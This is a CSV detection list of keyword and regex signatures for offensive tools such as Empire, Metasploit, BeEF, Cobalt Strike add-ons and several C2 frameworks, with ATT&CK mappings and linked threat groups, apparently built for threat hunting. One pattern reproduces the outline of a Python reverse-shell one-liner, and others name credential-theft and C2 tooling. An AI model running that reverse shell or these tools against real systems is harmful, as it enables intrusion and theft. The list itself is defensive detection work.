"*Exploit-Jenkins.ps1*",".{0,1000}Exploit\-Jenkins\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43585"
"*Exploit-JMXConsole*",".{0,1000}Exploit\-JMXConsole.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-JBoss.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43586"
"*exploits*_csrf/*.js*",".{0,1000}exploits.{0,1000}_csrf\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","43587"
"*exploits*_csrf/*.rb*",".{0,1000}exploits.{0,1000}_csrf\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","43588"
"*exploits/*_macro*",".{0,1000}exploits\/.{0,1000}_macro.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43589"
"*exploits/CVE-*",".{0,1000}exploits\/CVE\-.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43590"
"*exploits-forsale/prefetch-tool*",".{0,1000}exploits\-forsale\/prefetch\-tool.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","1","N/A","N/A","8","1","90","10","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z","43591"
"*exploit-suggester*",".{0,1000}exploit\-suggester.{0,1000}","offensive_tool_keyword","Windows-Exploit-Suggester","This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins","T1199 - T1082 - T1210","TA0006 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/AonCyberLabs/Windows-Exploit-Suggester","1","1","N/A","N/A","N/A","10","4055","1036","2023-05-11T12:44:55Z","2014-07-08T13:16:28Z","43592"
"*ExploitTest.cpp*",".{0,1000}ExploitTest\.cpp.{0,1000}","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tool","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","N/A","5","460","134","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z","43593"
"*ExploitTest.vcxproj*",".{0,1000}ExploitTest\.vcxproj.{0,1000}","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tool","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","N/A","5","460","134","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z","43594"
"*explorer /root,c:\windows\system32\sdclt.exe*",".{0,1000}explorer\s\/root,c\:\\windows\\system32\\sdclt\.exe.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","43595"
"*export KRB5CCNAME=*.ccache*",".{0,1000}export\sKRB5CCNAME\=.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","0","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","43603"
"*export KRB5CCNAME=/*/impacket/administrator.ccache* ",".{0,1000}export\sKRB5CCNAME\=\/.{0,1000}\/impacket\/administrator\.ccache.{0,1000}\s","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","43604"
"*export NEMESIS_BASE_URL*",".{0,1000}export\sNEMESIS_BASE_URL.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","43605"
"*export NEMESIS_CREDS*",".{0,1000}export\sNEMESIS_CREDS.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","43606"
"*export RESOCKS_KEY=*",".{0,1000}export\sRESOCKS_KEY\=.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","43607"
"*export RHOST=*export RPORT=*python3 -c*socket.socket()*connect*os.getenv(""RHOST"")*pty.spawn(""sh"")*",".{0,1000}export\sRHOST\=.{0,1000}export\sRPORT\=.{0,1000}python3\s\-c.{0,1000}socket\.socket\(\).{0,1000}connect.{0,1000}os\.getenv\(\""RHOST\""\).{0,1000}pty\.spawn\(\""sh\""\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","43608"
"*Export-PowerViewCSV*",".{0,1000}Export\-PowerViewCSV.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","43622"
"*Export-PowerViewCSV*",".{0,1000}Export\-PowerViewCSV.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43623"
"*Export-PowerViewCSV*",".{0,1000}Export\-PowerViewCSV.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","43624"
"*exports --dll *.dll --prototypes ./Assets/prototypes.csv*",".{0,1000}exports\s\-\-dll\s.{0,1000}\.dll\s\-\-prototypes\s\.\/Assets\/prototypes\.csv.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","#linux","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","43625"
"*exposed_get_password*",".{0,1000}exposed_get_password.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","43628"
"*exrienz/DirtyCow*",".{0,1000}exrienz\/DirtyCow.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/exrienz/DirtyCow","1","1","N/A","N/A","N/A","1","28","25","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z","43629"
"*Extedx765ensioedx765ns/*",".{0,1000}Extedx765ensioedx765ns\/.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","43630"
"*extensions/sniffer*",".{0,1000}extensions\/sniffer.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43631"
"*ExtensionSpoof.vbproj*",".{0,1000}ExtensionSpoof\.vbproj.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","43632"
"*ExtensionSpoof.xml*",".{0,1000}ExtensionSpoof\.xml.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","43633"
"*ExtensionSpoofer-1.zip*",".{0,1000}ExtensionSpoofer\-1\.zip.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","1","N/A","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","43634"
"*External Drive Password Recovery*",".{0,1000}External\sDrive\sPassword\sRecovery.{0,1000}","offensive_tool_keyword","ExtPassword.exe","Nirsoft tool for Windows that allows you to recover passwords stored on external drive plugged to your computer","T1081 - T1003 - T1212","TA0006 - TA0009","N/A","LockBit","Credential Access","https://www.nirsoft.net/utils/external_drive_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43635"
"*external_c2.cna*",".{0,1000}external_c2\.cna.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","43636"
"*ExternalC2.*",".{0,1000}ExternalC2\..{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","43637"
"*ExternalC2.dll*",".{0,1000}ExternalC2\.dll.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","43638"
"*ExternalC2.Net*",".{0,1000}ExternalC2\.Net.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","43639"
"*ExternalC2.Net.*",".{0,1000}ExternalC2\.Net\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","43640"
"*externalc2.py*",".{0,1000}externalc2\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","43641"
"*ExternalC2\*",".{0,1000}ExternalC2\\.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","43642"
"*externalc2_start*",".{0,1000}externalc2_start.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","43643"
"*ExternalC2Core*",".{0,1000}ExternalC2Core.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","43644"
"*ExternalC2-master*",".{0,1000}ExternalC2\-master.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","43645"
"*ExternalC2Tests*",".{0,1000}ExternalC2Tests.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","43646"
"*ExternalC2Web*",".{0,1000}ExternalC2Web.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","43647"
"*ExternalRecon.ps1*",".{0,1000}ExternalRecon\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","43649"
"*ExtPassword.exe*",".{0,1000}ExtPassword\.exe.{0,1000}","offensive_tool_keyword","ExtPassword.exe","Nirsoft tool for Windows that allows you to recover passwords stored on external drive plugged to your computer","T1081 - T1003 - T1212","TA0006 - TA0009","N/A","LockBit","Credential Access","https://www.nirsoft.net/utils/external_drive_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43650"
"*extract_cmd_exec*.js*",".{0,1000}extract_cmd_exec.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","43651"
"*extract_cmd_exec*.rb*",".{0,1000}extract_cmd_exec.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","43652"
